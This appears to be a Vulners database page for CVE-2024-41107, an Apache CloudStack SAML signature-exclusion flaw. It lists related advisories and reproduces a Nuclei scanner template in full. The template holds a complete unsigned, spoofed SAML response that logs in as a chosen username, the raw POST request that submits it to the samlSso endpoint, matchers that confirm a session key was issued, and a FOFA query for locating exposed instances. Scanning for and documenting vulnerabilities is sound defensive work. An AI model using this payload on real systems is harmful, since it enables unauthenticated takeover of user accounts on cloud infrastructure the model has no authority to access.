| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for Authentication Bypass by Spoofing in Apache Cloudstack | 23 Jul 202409:39 | – | githubexploit | |
| The vulnerability of the Single Sign-On module for application-based SAML protocols in the Apache CloudStack software, which is used for creating, managing, and deploying infrastructure cloud services, allows a perpetrator to bypass authentication processes and gain full access to any user’s account. | 22 Jul 202400:00 | – | bdu_fstec | |
| CVE-2024-41107 | 19 Jul 202413:42 | – | circl | |
| Apache CloudStack 安全漏洞 | 19 Jul 202400:00 | – | cnnvd | |
| Apache CloudStack Security Bypass Vulnerability (CNVD-2024-33812) | 23 Jul 202400:00 | – | cnvd | |
| CVE-2024-41107 | 19 Jul 202410:19 | – | cve | |
| CVE-2024-41107 Apache CloudStack: SAML Signature Exclusion | 19 Jul 202410:19 | – | cvelist | |
| CVE-2024-41107 | 19 Jul 202411:15 | – | nvd | |
| CVE-2024-41107 | 19 Jul 202411:15 | – | osv | |
| PT-2024-5029 · Apache · Apache Cloudstack | 19 Jul 202400:00 | – | ptsecurity |
id: CVE-2024-41107
info:
name: Apache CloudStack - SAML Signature Exclusion
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account
impact: |
Unauthenticated attackers can bypass SAML authentication by submitting spoofed SAML responses without signatures.
remediation: |
Update Apache CloudStack to a version that enforces SAML signature validation.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-41107
- http://www.openwall.com/lists/oss-security/2024/07/19/1
- http://www.openwall.com/lists/oss-security/2024/07/19/2
- https://cloudstack.apache.org/blog/security-release-advisory-cve-2024-41107
- https://github.com/apache/cloudstack/issues/4519
classification:
epss-score: 0.1776
epss-percentile: 0.96797
cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: app="APACHE-CloudStack"
product: cloudstack
vendor: apache
tags: cve,cve2024,apache,cloudstack,auth-bypass,vuln
variables:
username: "{{username}}"
entityid: "{{entityid}}"
saml_id: "{{saml_id}}"
saml: '<?xml version="1.0" encoding="UTF-8"?><samlp:Response Destination="{{RootURL}}/client/api?command=samlSso" ID="_b0389fca0ea65fe8e857" InResponseTo="{{saml_id}}" IssueInstant="2024-07-30T10:48:20.307Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer> <samlp:Status xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /> </samlp:Status> <saml:Assertion ID="_7a2993514112bbc72696" IssueInstant="2024-07-30T10:58:20.307Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer> <saml:Conditions NotBefore="2024-07-30T10:43:20.307Z" NotOnOrAfter="2024-07-30T10:53:20.307Z" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:AudienceRestriction> <saml:Audience>org.apache.cloudstack</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2024-07-30T10:48:20.307Z" SessionIndex="{{saml_id}" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:AuthnContext> <saml:AuthnContextClassRef> urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"> <saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">{{username}}</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion></samlp:Response>'
http:
- raw:
- |
POST /client/api?command=samlSso HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
RelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(header,'sessionkey')"
- "contains(content_type,'text/xml')"
- "status_code==302"
condition: and
# digest: 4a0a00473045022100980dfac75f286f33d6955fb82271d9608b57a2d200794519dffc45e2ad8751710220321d6dbb12c005d7e67544519ba0ead919b80182926280fcb3afbfebf6f94f42:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation